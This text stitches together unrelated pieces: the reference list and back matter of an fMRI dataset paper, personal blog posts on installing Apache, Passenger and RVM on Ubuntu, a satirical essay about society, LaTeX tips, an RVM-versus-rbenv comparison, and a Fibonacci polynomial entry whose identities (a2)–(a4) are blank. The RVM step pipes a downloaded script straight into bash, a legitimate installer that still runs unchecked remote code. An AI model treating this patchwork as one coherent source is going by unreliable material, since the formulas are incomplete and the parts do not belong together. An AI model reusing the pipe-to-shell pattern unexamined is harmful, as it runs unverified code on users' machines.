2. Costafreda, S. Meta-Analysis, Mega-Analysis, and Task Analysis in fMRI Research. Philosophy, Psychiatry, & Psychology 18, 275–277, https://doi.org/10.1353/ppp.2011.0049 (2011).
3. Schwartz, Y. et al. Improving Accuracy and Power with Transfer Learning Using a Meta-analytic Database. In Ayache, N., Delingette, H., Golland, P. & Mori, K. (eds.) Med Image Comput Comput Assist Interv. 2012 (Springer, Berlin, Heidelberg), 15, 248–255. https://doi.org/10.1007/978-3-642-33454-2_31 (2012).
4. Schwartz, Y., Thirion, B. & Varoquaux, G. Mapping cognitive ontologies to and from the brain. In NIPS’13: Proceedings of the 26th International Conference on Neural Information Processing Systems (Curran Associates Inc., Red Hook, NY, USA), 2, 1673–1681. https://arxiv.org/abs/1311.3859 (2013).
5. Varoquaux, G., Schwartz, Y., Pinel, P. & Thirion, B. Cohort-Level Brain Mapping: Learning Cognitive Atoms to Single Out Specialized Regions. In Gee, J. C., Joshi, S., Pohl, K. M., Wells, W. M. & Zöllei, L. (eds.) Inf Process Med Imaging (Springer, Berlin, Heidelberg), 23, 438–449. https://doi.org/10.1007/978-3-642-38868-2_37 (2013).
6. Wager, T. D. et al. An fMRI-Based Neurologic Signature of Physical Pain. N Engl J Med 368, 1388–1397, https://doi.org/10.1056/NEJMoa1204471 (2013).
7. Gurevitch, J., Koricheva, J., Nakagawa, S. & Stewart, G. Meta-analysis and the science of research synthesis. Nature 555, 175–182, https://doi.org/10.1038/nature25753 (2018).
8. Müller, V. I. et al. Ten simple rules for neuroimaging meta-analysis. Neurosci Biobehav Rev 84, 151–161, https://doi.org/10.1016/j.neubiorev.2017.11.012 (2018).
9. Varoquaux, G. et al. Atlases of cognition with large-scale brain mapping. PLoS Comput Biol 14. https://doi.org/10.1371/journal.pcbi.1006565 (2018).
10. Barch, D. M. et al. Function in the human connectome: Task-fMRI and individual differences in behavior. Neuroimage 80, 169–89, https://doi.org/10.1016/j.neuroimage.2013.05.033 (2013).
11. Glasser, M. F. et al. A multi-modal parcellation of human cerebral cortex. Nature 536, 171–178, https://doi.org/10.1038/nature18933 (2016).
12. Pinel, P. et al. Fast reproducible identification and large-scale databasing of individual functional cognitive networks. BMC Neurosci 8, 91, https://doi.org/10.1186/1471-2202-8-91 (2007).
13. Pinel, P. et al. The functional database of the ARCHI project: Potential and perspectives. Neuroimage 197, 527–543, https://doi.org/10.1016/j.neuroimage.2019.04.056 (2019).
14. Hanke, M. et al. A high-resolution 7-Tesla fMRI dataset from complex natural stimulation with an audio movie. Sci Data 1. https://doi.org/10.1038/sdata.2014.3 (2014).
15. Hanke, M. et al. High-resolution 7-tesla fmri data on the perception of musical genres–an extension to the studyforrest dataset. F1000Res 4, 174, https://doi.org/10.12688/f1000research.6679.1 (2015).
16. Hanke, M. et al. A studyforrest extension, simultaneous fMRI and eye gaze recordings during prolonged natural stimulation. Sci Data 3. https://doi.org/10.1038/sdata.2016.92 (2016).
17. Sengupta, A. et al. A studyforrest extension, retinotopic mapping and localization of higher visual areas. Sci Data 3. https://doi.org/10.1038/sdata.2016.93 (2016).
18. Nee, D. E. fMRI replicability depends upon sufficient individual-level data. Commun Biol 2, 1–4, https://doi.org/10.1038/s42003-018-0073-z (2019).
19. Pinho, A. L. et al. Individual Brain Charting, a high-resolution fMRI dataset for cognitive mapping. Sci Data 5, 180105, https://doi.org/10.1038/sdata.2018.105 (2018).
20. Humphries, C., Binder, J. R., Medler, D. A. & Liebenthal, E. Syntactic and Semantic Modulation of Neural Activity During Auditory Sentence Comprehension. J Cogn Neurosci 18, 665–679, https://doi.org/10.1162/jocn.2006.18.4.665 (2006).
21. Poldrack, R. et al. The Cognitive Atlas: Toward a Knowledge Foundation for Cognitive Neuroscience. Front Neuroinform 5, 17, https://doi.org/10.3389/fninf.2011.00017 (2011).
22. Gorgolewski, K. et al. The brain imaging data structure: a standard for organizing and describing outputs of neuroimaging experiments. Sci Data 3, 160044, https://doi.org/10.1038/sdata.2016.44 (2016).
23. Oldfield, R. C. The assessment and analysis of handedness: the Edinburgh inventory. Neuropsychologia 9, 97–113, https://doi.org/10.1016/0028-3932(71)90067-4 (1971).
24. Gauthier, B. & van Wassenhove, V. Cognitive mapping in mental time travel and mental space navigation. Cognition 154, 55–68, https://doi.org/10.1016/j.cognition.2016.05.015 (2016).
25. Gauthier, B. & van Wassenhove, V. Time Is Not Space: Core Computations and Domain-Specific Networks for Mental Travels. J Neurosci 36, 11891–11903, https://doi.org/10.1523/JNEUROSCI.1400-16.2016 (2016).
26. Gauthier, B., Pestke, K. & van Wassenhove, V. Building the Arrow of Time. Over Time: A Sequence of Brain Activity Mapping Imagined Events in Time and Space. Cereb Cortex 29, 4398–4414, https://doi.org/10.1093/cercor/bhy320 (2018).
27. Lebreton, M., Abitbol, R., Daunizeau, J. & Pessiglione, M. Automatic integration of confidence in the brain valuation signal. Nat Neurosci 18, 1159–67, https://doi.org/10.1038/nn.4064 (2015).
28. Dodell-Feder, D., Koster-Hale, J., Bedny, M. & Saxe, R. fMRI item analysis in a theory of mind task. Neuroimage 55, 705–712, https://doi.org/10.1016/j.neuroimage.2010.12.040 (2011).
29. Jacoby, N., Bruneau, E., Koster-Hale, J. & Saxe, R. Localizing Pain Matrix and Theory of Mind networks with both verbal and non-verbal stimuli. Neuroimage 126, 39–48, https://doi.org/10.1016/j.neuroimage.2015.11.025 (2016).
30. Richardson, H., Lisandrelli, G., Riobueno-Naylor, A. & Saxe, R. Development of the social brain from age three to twelve years. Nat Commun 9. https://doi.org/10.1038/s41467-018-03399-2 (2018).
31. Knops, A., Piazza, M., Sengupta, R., Eger, E. & Melcher, D. A Shared, Flexible Neural Map Architecture Reflects Capacity Limits in Both Visual Short-Term Memory and Enumeration. J Neurosci 34, 9857–9866, https://doi.org/10.1523/JNEUROSCI.2758-13.2014 (2014).
32. Genon, S. et al. Cognitive and neuroimaging evidence of impaired interaction between self and memory in Alzheimer’s disease. Cortex 51, 11–24, https://doi.org/10.1016/j.cortex.2013.06.009 (2014).
33. Campbell, K. L. et al. Idiosyncratic responding during movie-watching predicted by age differences in attentional control. Neurobiol Aging 36, 3045–3055, https://doi.org/10.1016/j.neurobiolaging.2015.07.028 (2015).
34. Luck, S. & Vogel, E. The capacity of visual working memory for features and conjunctions. Nature 390, 279–281, https://doi.org/10.1038/36846 (1997).
35. Piazza, M., Mechelli, A., Butterworth, B. & Price, C. J. Are Subitizing and Counting Implemented as Separate or Functionally Overlapping Processes? Neuroimage 15, 435–446, https://doi.org/10.1006/nimg.2001.0980 (2002).
36. Todd, J. J. & Marois, R. Capacity limit of visual short-term memory in human posterior parietal cortex. Nature 428, 751, https://doi.org/10.1038/nature02466 (2004).
37. Newell, A. & Simon, H. A. Human problem solving. 1st edn. (Prentice-Hall, NJ, 1972).
38. Ericsson, K. A. & Kintsch, W. Long-term working memory. Psychol Rev 102, 211–245, https://doi.org/10.1037/0033-295x.102.2.211 (1995).
39. Moeller, S. et al. Multiband multislice GE-EPI at 7 Tesla, with 16-fold acceleration using partial parallel imaging with application to high spatial and temporal whole-brain fMRI. Magn Reson Med 63, 1144–53, https://doi.org/10.1002/mrm.22361 (2010).
40. Feinberg, D. A. et al. Multiplexed Echo Planar Imaging for Sub-Second Whole Brain fMRI and Fast Diffusion Imaging. PLoS One 5, 1–11, https://doi.org/10.1371/journal.pone.0015710 (2010).
41. Andersson, J. L., Skare, S. & Ashburner, J. How to correct susceptibility distortions in spin-echo echo-planar images: application to diffusion tensor imaging. Neuroimage 20, 870–888, https://doi.org/10.1016/S1053-8119(03)00336-7 (2003).
42. Smith, S. et al. Advances in functional and structural MR image analysis and implementation as FSL. Neuroimage 23(Supplement 1), S208–S219, https://doi.org/10.1016/j.neuroimage.2004.07.051 (2004).
43. Friston, K., Frith, C., Frackowiak, R. & Turner, R. Characterizing Dynamic Brain Responses with fMRI: a Multivariate Approach. Neuroimage 2, 166–172, https://doi.org/10.1006/nimg.1995.1019 (1995).
44. Ashburner, J. & Friston, K. Multimodal Image Coregistration and Partitioning - A Unified Framework. Neuroimage 6, 209–217, https://doi.org/10.1006/nimg.1997.0290 (1997).
45. Ashburner, J. & Friston, K. J. Unified segmentation. Neuroimage 26, 839–851, https://doi.org/10.1016/j.neuroimage.2005.02.018 (2005).
46. Friston, K. et al. Event-related fMRI: Characterizing differential responses. Neuroimage 7, 30–40, https://doi.org/10.1006/nimg.1997.0306 (1998).
47. Friston, K., Josephs, O., Rees, G. & Turner, R. Nonlinear event-related responses in fMRI. Magn Reson Med 39, 41–52, https://doi.org/10.1002/mrm.1910390109 (1998).
48. Abraham, A. et al. Machine learning for neuroimaging with scikit-learn. Front Neuroinform 8, 14, https://doi.org/10.3389/fninf.2014.00014 (2014).
49. Poldrack, R. et al. Toward open sharing of task-based fMRI data: the openfMRI project. Front Neuroinform 7, 12, https://doi.org/10.3389/fninf.2013.00012 (2013).
50. Pinho, A. L. et al. IBC. OpenNeuro https://openneuro.org/datasets/ds002685/versions/1.0.0 (2020).
51. Pinho, A. L. et al. Individual Brain Charting. OpenNeuro. https://doi.org/10.18112/openneuro.ds000244.v1.0.0 (2017).
52. Gorgolewski, K. et al. NeuroVault.org: a web-based repository for collecting and sharing unthresholded statistical maps of the human brain. Front Neuroinform 9, 8, https://doi.org/10.3389/fninf.2015.00008 (2015).
53. Pinho, A. L. et al. IBC release 2. NeuroVault. https://identifiers.org/neurovault.collection:6618 (2020).
54. Pinho, A. L. et al. Individual Brain Charting (IBC): Activation maps per contrast, session and individual. NeuroVault. https://identifiers.org/neurovault.collection:4438 (2018).
55. Murphy, K., Bodurka, J. & Bandettini, P. A. How long to scan? the relationship between fMRI temporal signal to noise ratio and necessary scan duration. Neuroimage 34, 565–574, https://doi.org/10.1016/j.neuroimage.2006.09.032 (2007).
56. Kriegeskorte, N., Mur, M. & Bandettini, P. Representational similarity analysis–connecting the branches of systems neuroscience. Front Syst Neurosci 2. https://doi.org/10.3389/neuro.06.004.2008 (2008).
## Acknowledgements
We thank Rebecca Saxe and colleagues for making publicly available the TOM and Pain Matrices task battery and for the availability to further clarify their implementation, designs and analyses. In particular, we would like to thank Hilary Richardson for the assistance regarding the implementation of the Pain Movie localizer and extraction of its paradigm descriptors for data analysis. We also thank Karen L. Campbell and Lorraine K. Tyler for having kindly provided the video and descriptors of the “Bang” task, which were respectively necessary for a successful re-implementation of the protocol and analysis of data. We thank the Center for Magnetic Resonance Research, University of Minnesota for having kindly provided the Multi-Band Accelerated EPI Pulse Sequence and Reconstruction Algorithms. We are grateful to Kamalaker Dadi, Loubna El Gueddari and Darya Chyzhyk for their assistance in some MRI acquisitions as well as Isabelle Denghien for the advisory and technical support in setting the task protocols. At last, we are especially thankful to all volunteers who have accepted to be part of this challenging study, with many repeated MRI scans over a long period of time. This project has received funding from the European Union’s Horizon 2020 Framework Program for Research and Innovation under Grant Agreement No 720270 (Human Brain Project SGA1) and 785907 (Human Brain Project SGA2).
## Author information
### Corresponding author
Correspondence to Ana Luísa Pinho.
## Ethics declarations
### Competing interests
The authors declare no competing interests.
Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
## Rights and permissions
The Creative Commons Public Domain Dedication waiver http://creativecommons.org/publicdomain/zero/1.0/ applies to the metadata files associated with this article.
Pinho, A.L., Amadon, A., Gauthier, B. et al. Individual Brain Charting dataset extension, second release of high-resolution fMRI data for cognitive mapping. Sci Data 7, 353 (2020). https://doi.org/10.1038/s41597-020-00670-4
# Install apache web server and passenger on Ubuntu 11.04 (Natty)

I just installed Apache and Passenger on Ubuntu 11.04 to run and deploy my Ruby on Rails applications. Passenger is a gem and can work with Apache as well as Nginx.

The reason for choosing Apache is that it's an industry standard.

One other thing I did with Apache was to create virtual hosts and run my apps on my local machine with domains like http://www.application1.com.

In this post I will list the steps I followed in order to set up the Apache web server and Passenger.
Here is my stack:
• Ubuntu 11.04
• ruby 1.9.2 via rvm
• rubygems 1.8.10
I will be using rails 3.1.10 (latest as of this morning)!!

So let's start!!
• Install rvm
To install rvm just type the following in the terminal (Ctrl+Alt+T):

    user$ bash < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)

You can find more information about rvm here.

• Install ruby via rvm

Once rvm is installed, you can install the latest or desired version of ruby by typing the following in the terminal:

    rvm install 1.9.2

This will install ruby 1.9.2 on your system. More information on how to make it your default ruby is available here.

• Install rails

You just need to do:

    gem install rails

• Install passenger

Just do:

    gem install passenger

• Install apache web server

To install the apache web server, type:

    sudo apt-get install apache2 apache2-mpm-prefork apache2-prefork-dev

• Install the passenger apache module

Once this is done, we must install Passenger's apache module, which helps us run rails apps on apache:

    sudo passenger-install-apache2-module

• Configure

Finally, everything is done. When you run the passenger apache module installer, it will give you some instructions. The last thing it will tell you is to paste some text into the apache configuration file, located at /etc/apache2/apache2.conf.

Now once this is done, we are ready to deploy. This has a lot of information about deploying. In my next post, I will show how to start rails apps on a local machine with apache.

Hope it helps!

# A candid interview with Society !!

It feels so great!!! Amitabh Bachchan in Hindi movies or Clint Eastwood in the 70s and 80s, revolting against society!!! Wow, I hope I can be such a hero too! Speak dialogues in front of an idol like Vijay, or fire a gun like Eastwood does!! Was it only the greatness of Salim-Javed and Sergio Leone (not related to Sunny Leone, I presume!!), or do we need such rebellions??

I think, like our economy, our society and our value system are at an all-time low!!! We are in the midst of a moral recession. Look in the mirror! What are we doing? Where are we headed? What's our objective? What's with us?? This is what I felt. So, I decided to take an interview of Society on four basic factions of life: childhood, youth, parenthood and old age. Here are the views of Society on these factions, in summary.

We first talk about childhood. Oh! Childhood is an age of innocence. It is that period of life when everything is so beautiful. What are your views?

O yes, childhood is a great phase of life. Probably the greatest. Now, what I do with childhood is very simple. For me, childhood is not a phase to enjoy; childhood is a phase where I can impart a value system into that small brain, or what people call the first floor of humans. I impart knowledge like: we believe in only a particular god. The choice of god varies depending on my wish. If I am Christian, I say Jesus is the true god and others are not. If I am a Hindu, I say Shiva or Krishna is the true god and nothing else. If I am Islamic, I say Allah is the path to salvation and nothing else. So I impart this invaluable knowledge to them. See, I am doing this for them. I am training them to fight for the rest of their lives. If this is not taught, how will they fight? What will they do? Then I also somehow manage to convince them that the scriptures are very, very true. They are very literal and you have to believe in miracles. That is actually easy, as they do not know much about science at that time and, to tell you a secret, I also tell them that if they ever ask me a question, they will be punished!! Isn't it cool? Then, I send them to school! There I give information and tell them that this is knowledge.
Those poor little beings believe it!! They actually think school and college are places where they get knowledge. This is the greatest failure of knowledge, isn't it?? (hehe). Then, when they say they have gained knowledge, I ask, how do I know? Prove it by getting good grades in the exams. Memory is the pathway of knowledge for them, and this, I think, is a very innovative idea of mine. This is imparted in the human brain and is executed throughout. Humans, stupid humans, actually believe that intelligence is knowing things. In an IQ test, they ask some questions regarding who was who, and who did what and when, etc.! And with that they test their intelligence!!! (Hahahahahahha).

Anyway, then I gradually expose them to the outside world. I show them movies, give them books, etc. I show them shows like “Mahabharat” or “Jesus Story” and tell them television is true. But this has a side effect: when they see things like “Original Sin”, “Ma Mère” or “Munni Badnam” and “Sheila Jawan”, I scold them. I say that's not what you should learn. Though I allow the makers to make it and the elders to watch it, it is not for children. Some say what this does is confuse a child's mind, but I say no, the only rule is: follow my rules without question!! Thus, in childhood, I impart qualities like competition, rivalry and the winning spirit, and also gifts. I give gifts when you are successful and punish you when you fail!!!

Then comes youth. Another good phase. The human at his or her prime in life, full of energy and enthusiasm! What about it?

Well, yes, youth is a good stage. It's a good platform to teach advanced things now. In this stage, I introduce them to money. I give them money but not the permission to spend it. So, they are confused. Then I tell them what's good and what's bad, without reasoning! I say drugs are bad, not why they are bad. Of course, as god has made humans curious, they want to know why drugs are bad and hence consume them. That's it: as soon as they consume them, I proclaim them sinners. I punish them and I isolate them. The result: they take more drugs. And computer scientists thought recursion was their invention!!!

Then, for someone who has escaped this devious and brilliant plot, I surely trap them in marriage. See, I am a humanitarian, I allow you to love. But, as usual, the catch is that you can't marry the person you love. There are things like caste and creed that I have to take care of. And then, I fill the human mind with the root cause of all troubles: “expectations”. I teach them to expect things from the person they want to marry. I teach them:

We are the invincible ones. We are the most popular ones. Each and everyone needs us, you see. But of course, we are also humans and we have our requirements. We look for some basic qualities in our partner. Come on, they are not very difficult. We are good people, you see. All we expect is that the partner should be good looking and have a good figure or physique. They should have style, you see. We need it because when we introduce them to our friends, our style and status should be maintained. He or she should know how to behave in a 5-star hotel, how to speak English full of accent, how to drink wine, and how to hold hands and dance at a party. He or she should like my friends and appreciate my habits. Even if I smoke, he or she should not. Even if I flirt with someone else, he or she should be faithful. Even if I do not give a damn about my parents, he or she should. Even if I courier her or him a gift, he or she should be happy! That's all we ask for. Nothing more.
And yes, of course, they should not have been married before. You see, we need “fresh” people. And of course, in many cultures, marrying a divorcee or a widow is a crime. And, kind of as a postscript: their fathers must be rich. They should be able to fulfill our dreams! I dream of buying a car, and since I am a divine being, he should fulfill it as a duty!! That's all, see how nice we are!! See, isn't it good?? Isn't it correct?? I know I am a master, I can tell from your expression, kid!!!

Then comes parenthood. A gift of god! The birth of a human life. How do you deal with that?

I start by seeing them cry. They cry when, in the hospital, they hear the crying of the baby. For me, it's an important phase, and I start early. I say: if the baby is a girl, then you ought to cry, you idiot! How could you do this? Girls, I somehow manage to convince people, are not a creation of god. The idiots believe me. They know their own mother is a girl, and still, many times and in many cultures, I have convinced man to kill the girl!! I love it. But I do not stop there. Then there is a simple course for parents. That is actually a result of what I taught in childhood: rivalry, competition, etc. Now the concepts are applied to children. The average guy is always told “learn from your brother/sister”. Isn't it so?? Now, I don't see anything wrong in it! Of course, studies and grades are everything! People not good at studies, or those who do not get good grades, should understand that they have responsibilities toward their parents! What will their parents say to the relatives and neighbours?? What do they talk about if you do not top the class or do not win a trophy on your sports day?? How will they say “see, this is my son's certificate” with a proud laugh on their face and a hidden feeling of achievement, since the relative's son stood second?! Guys, we have to understand that World War 3 is all parallel! Each house and family has its own version of World War 3!!! Come on, you can't be average!! But what do we actually learn in school and college? It's just information anyway. Knowledge was long lost when we used memory to test intelligence. How great of me that we expect our students to understand information!! One may ask how you “understand” that flight AI-103 is going from Bombay to London!! Isn't it the same as a teacher who, after teaching a chapter on Gandhi, asks “Understood?”???? Today I care more about the translation of the Gita than about understanding it!!

Then comes old age! Probably the most difficult phase of life.

All traditions and religions in the world say we should respect our elders! So I do. We make better old-age homes! I give them better facilities. I give them a garden to have an evening walk in, with those artistic-looking sticks I gave them as a birthday present and those arthritis-inflicted legs which nature gave them. I give them a library, books to read with those Armani glasses I gave them and those eyes that can't see clearly which nature gave them. I give them cozy beds and heaters or air conditioning so they can sleep properly, forgetting that merely closing one's eyes is not sleeping. I give them smartphones to stay in touch! So they can contact us when in need! Knowing that those shaking hands cannot dial or remember the number!! We give them good medical facilities so they do not feel any pain. I give them medicines, as their blood pressure increases when going to a doctor. They say they need their children. Are they mad? The children are busy: they have a meeting to attend, otherwise their company would go bankrupt.
They have their car to be serviced, wine to be purchased, extra language classes to attend, a gym to go to, and a temple or church to worship in. They are so, so busy! Come on, tell the oldies to handle themselves. And then the elders say, all we need is your smile, and I say, no I can't, I have to mourn for a train accident victim, you see! All they ask is, can you spend one hour on a Sunday, and I say no, I have to go to mass and feed the homeless! The old people must understand: I don't have time for their stupid emotions. I will talk to you only if the talking helps my bank balance in some way! I do this much for them; be content with what you get. You get free money. What else do you need?

Mr. Society, aren't you afraid of god? God? Hahaha. Tell me, what is god? How did you come to know about the concept of god? It is through me, child. I created god. And god, where is he? Can he do anything? I am the one who stays with you every day, every minute! I am the one with you, always. I have been with you for ages and I will be with you forever. I am a parasite which eats you, which consumes you, and you do not have a medicine for me. You cannot harm me. You can't live without me, you see. After all, you are a social animal! The Mayans said that the world would end in 2012. While factually incorrect, I suppose they understood the parasite I am talking about. A cancer, my interviewer friend, kills you. I, on the other hand, give you life. Though it is true that I have now grown so strong that living with a parasite like me is more difficult than being killed by a cancer!

# Compiling a LaTeX Document

Having prepared your first TeX document, I was pretty excited to see the output. But there was one daunting question: what is the next step? Fortunately, I was using Kile, so I got my PDF in a click, but I wanted to figure out how to get the same PDF using the command line. Here is the procedure:

STEP 1: Suppose the file "my_report.tex" contains all the author's work, i.e., her actual typed words and formulae. It was typed using the text editor vi; similar text editors include emacs, pico, Notepad (on Windows), and TextEdit (on Macs). First navigate to the place where the .tex file is located using the terminal, then run the command:

latex my_report.tex

This produces a bunch of files. One of them is my_report.dvi; "dvi" stands for "device independent". The file my_report.dvi is the same regardless of (1) which computer is used to compile the document and (2) what kind of printer it is headed for. In fact, it is too universal to be printed in this form; it must still be translated to a form suitable for a specific kind of printer. (Different printers speak different languages.) You can't even view the DVI file unless you use a special DVI viewer, such as xdvi on ucsub. The files my_report.aux and my_report.log are two by-products of the compile command. The .aux file is used if the document contains more complicated material, like a bibliography and cross-references. The .log file contains a full record of the compilation, including errors you need to correct, e.g., misspelled macros, missing brackets or parentheses, missing references, etc.

STEP 2: The file my_report.ps is a PostScript file, the kind understood by most laser printers. A printable PostScript file is created from the DVI file by the translating program dvips.
To produce it, run the command:

dvips my_report.dvi

STEP 3: The file my_report.pdf is the PDF form of the document. This is about as web-friendly a document as possible: using Acrobat Reader, any computer can be used to view the document and/or print it. Running the command

dvipdfm my_report.dvi

translates the DVI file to PDF form. That's it! Hope it helps!

# Special Characters and Symbols in LaTeX

Following are the ways to get special characters and symbols while creating a document using LaTeX:

Quotation Marks
Use two ` (grave accent) characters for opening quotation marks and two ' (vertical quote) characters for closing quotation marks.

Dashes and Hyphens
LaTeX knows four kinds of dashes. Access three of them with different numbers of consecutive dashes. The fourth sign is actually not a dash at all—it is the mathematical minus sign. The names for these dashes are: '-' hyphen, '–' en-dash, '—' em-dash and '−' minus sign. Examples of each are shown below:
• daughter-in-law —> daughter-in-law
• pages 13--67 —> pages 13–67
• yes---or no? —> yes—or no?
• $0$, $1$ and $-1$ —> 0, 1 and −1

Tilde (∼)
$\sim$

Slash (/)
\slash

Degree Symbol (◦)
Use math mode, e.g. $30\,^{\circ}\mathrm{C}$ for 30 °C.
The textcomp package also makes the degree symbol available as \textdegree, or in combination with the C via the \textcelsius command.
The Euro Currency Symbol
\texteuro
NOTE: it is also provided by the textcomp package.
Ellipsis (. . . )
On a typewriter, a comma or a period takes the same amount of space as
any other letter. In book printing, these characters occupy only a little space
and are set very close to the preceding letter. Therefore, entering ‘ellipsis’
by just typing three dots would produce the wrong result. Instead, there is
a special command for these dots. It is called
\ldots
Ligatures
Some letter combinations are typeset not just by setting the different letters
one after the other, but by actually using special symbols.
These so-called ligatures can be prohibited by inserting an \mbox{} between
the two letters in question. This might be necessary with words built from
two words.
Example:
\Large Not shelfful\\
but shelf\mbox{}ful
This typesets "Not shelfful" with the ff ligature on the first line and "but shelfful" with the ligature suppressed on the second.
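To see several of these symbols together, here is a minimal compilable sketch (my own example, not part of the original notes; it assumes the textcomp package is installed):

    \documentclass{article}
    \usepackage{textcomp} % provides \textdegree, \textcelsius and \texteuro
    \begin{document}
    pages 13--67, yes---or no?, $0$, $1$ and $-1$. % en dash, em dash, minus

    Water boils at $100\,^{\circ}\mathrm{C}$, i.e.\ 100\textcelsius.

    That book costs 10\texteuro{} \ldots{} a shelf\mbox{}ful of them costs more.
    \end{document}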
# Basic LaTeX document classes

Document class name and usage/meaning:
• article: for articles in scientific journals, presentations, short reports, program documentation, invitations, …
• proc: a class for proceedings, based on the article class.
• minimal: as small as it can get; it only sets a page size and a base font. It is mainly used for debugging purposes.
• report: for longer reports containing several chapters, small books, PhD theses, …
• book: for real books.
• slides: for slides; the class uses big sans serif letters. You might want to consider using the Beamer class instead.
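The class is selected in the very first line of the source file. A minimal sketch (my own illustration, not from the original notes):

    \documentclass[11pt,a4paper]{article} % swap in report, book, etc. as needed
    \begin{document}
    Hello, \LaTeX{} world!
    \end{document}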
The main advantages of LaTeX over normal word processors are the following:
• Professionally crafted layouts are available, which make a document really look as if "printed."
• The typesetting of mathematical formulae is supported in a convenient way.
• Users only need to learn a few easy-to-understand commands that specify the logical structure of a document. They almost never need to tinker with the actual layout of the document.
• Even complex structures such as footnotes, references, tables of contents, and bibliographies can be generated easily.
• Free add-on packages exist for many typographical tasks not directly supported by basic LaTeX. For example, packages are available to include PostScript graphics or to typeset bibliographies conforming to exact standards.
• LaTeX encourages authors to write well-structured texts, because this is how LaTeX works—by specifying structure.
• TeX, the formatting engine of LaTeX2e, is highly portable and free. Therefore the system runs on almost any hardware platform available.
The main disadvantages of LaTeX over normal word processors are the following:
• LaTeX does not work well for people who have sold their souls …
• Although some parameters can be adjusted within a predefined document layout, the design of a whole new layout is difficult and takes a lot of time.
• It is very hard to write unstructured and disorganized documents.
• Your hamster might, despite some encouraging first steps, never be able to fully grasp the concept of Logical Markup.
# RVM vs rbenv

Just installed a new Precise Pangolin and thought of giving rbenv a try, so I collected this with a bit of googling.
rbenv is a new lightweight Ruby version management tool built by Sam Stephenson (of 37signals and Prototype.js fame).
The established leader in the Ruby version management scene is RVM, but rbenv is an interesting alternative if you want or need something significantly lighter with fewer features. Think of it as a bit like Sinatra and Rails: it's not about which is the best, it's about which is better for you and your current requirements.
### What’s rbenv?
Compared to RVM, rbenv is light. For example, it doesn’t include any mechanism to install Ruby implementations like RVM does. Its sole job is to manage multiple Ruby “environments” and it allows you to quickly switch between Ruby implementations either on a local directory or default ‘system-wide’ basis.
With rbenv, you install Ruby implementations manually or, if you prefer a little help, you can try ruby-build, another project of Sam's that provides RVM-esque recipes for installing seven popular Ruby implementation and version combos.
rbenv primarily works by creating ‘shim’ files in ~/.rbenv/shims which call up the correct version of files for each Ruby implementation behind the scenes. This means ~/.rbenv/shims will be in your path and there’s no threat of incompatibilities between libraries or systems like Bundler and rbenv.
The key thing to be aware of, however, is that if you install a gem that includes ‘binaries’ (or any generally available command line scripts), you need to run rbenv rehash so that rbenv can create the necessary shim files.
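For example, a hypothetical session might look like this (the paths assume the default ~/.rbenv location):

    gem install bundler   # install a gem that ships command line executables
    rbenv rehash          # regenerate shims so the new commands resolve
    which bundle          # -> ~/.rbenv/shims/bundle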
### INSTALL
Firstly, it’s worth noting that by default rbenv is incompatible with RVM because RVM overrides the gem command with a function. This means to get the full rbenv experience you’ll need to do a rvm implode to wipe away your RVM installation or, at the least, remove/comment out the RVM loader line in your .bash_profile and/or .bashrc.
The installation instructions for rbenv are likely to change fast due to its youth, so I suggest the README. However, rbenv has just been made into a homebrew package on OS X, so if you’re a homebrew user (and if you’re not, check out my screencast), try:
brew update
brew install rbenv
rbenv rehash
And then add this line to your ~/.bash_profile or equivalent:
eval "$(rbenv init -)"

When you open a new shell now, you can run commands like rbenv and rbenv version to see what's going on. rbenv versions should return nothing, since you won't have any rbenv-enabled Ruby installations yet, so move on to the next step.

### Installing Implementations for rbenv

If you have ruby-build installed, getting, say, Ruby 1.9.2-p290 installed is easy:

ruby-build 1.9.2-p290 $HOME/.rbenv/versions/1.9.2-p290
If you prefer to download tarballs and do your own Ruby installs, however, you just need to set the directory prefix at the ./configure stage in most cases. For example:
./configure --prefix=$HOME/.rbenv/versions/1.9.2-p290

Once you've installed a new Ruby in this way, you need to run rbenv rehash in order for rbenv to create the 'shim' binaries necessary to make the correct version of Ruby available on the path at all times.

### The RVM Splashback

In the interests of completeness, it'd be amiss not to mention the minor drama that kicked off on Twitter and Hacker News around rbenv's release. rbenv made its way onto Hacker News where, surprisingly, many people railed against RVM. This, coupled with a slightly antagonistic tone taken by rbenv's README (which has since been removed), led RVM's maintainer Wayne E. Seguin to vent some pressure on Twitter. Sam quickly clarified his position. Nonetheless, Wayne took a little time off, and a campaign to encourage donations to Wayne for his work on RVM was kicked off on Twitter (by Ryan Bates, I believe). The campaign went well, taking RVM's donations from $7468 to $11370 (at the time of writing), a jump of almost $4000 in a few days.
Part of the complaint made in rbenv’s README was about RVM’s “obnoxious” redefinition of the “cd” shell builtin. Essentially, RVM would create a new function which called “cd” but also took into account any .rvmrc files present in each directory so that it could change Ruby version automatically. While there was some validity to this concern, Ben Atkin took some time to write a blog post correcting some of the misinformation on this point.
In the end, however, all seems to be well, and Wayne is already making regular commits to the RVM project again just days later. Hopefully the outpouring of support from the Ruby community for RVM over the past couple of days has shown Wayne that RVM still has a significant user base, most of whom aren't going anywhere new anytime soon. If you want to help out, of course, you can still donate to the RVM Pledgie.
### Conclusion
If you’re happy with RVM, there’s not much in rbenv to really leap to. It’s just a lighter and more modular way to achieve the basic functionality that RVM provides while missing out on a lot more (although you can use rbenv-gemset to get some basic gemset-like features).
If, however, you want something “lighter” than RVM, rbenv is certainly worth a look. Its approach feels cleaner and more transparent at a certain level, and if this is of utmost importance to you, you may prefer it.
I personally switched back to RVM because I was getting a tricky OpenSSL error (of course, my bad!) and was not able to get past it…
# Fibonacci polynomials
The Fibonacci polynomials $F_n(x)$ (cf. [a1] and [a4]) are given by
(a1) $F_1(x) = 1$, $F_2(x) = x$, and $F_{n+1}(x) = x F_n(x) + F_{n-1}(x)$ for $n \geq 2$.
They reduce to the Fibonacci numbers for $x = 1$, and they satisfy several identities, which may be easily proved by induction, e.g.:
(a2)
(a3)
(a4)
(a5) $F_n(x) = \dfrac{a^n(x) - b^n(x)}{a(x) - b(x)}$,
where
$a(x) = \frac{x + \sqrt{x^2+4}}{2}$, $b(x) = \frac{x - \sqrt{x^2+4}}{2}$, so that $a(x) + b(x) = x$ and $a(x)b(x) = -1$; and
(a6) $F_{n+1}(x) = \sum_{j=0}^{\lfloor n/2 \rfloor} \binom{n-j}{j} x^{n-2j}$,
where $\lfloor y \rfloor$ denotes the greatest integer in $y$.
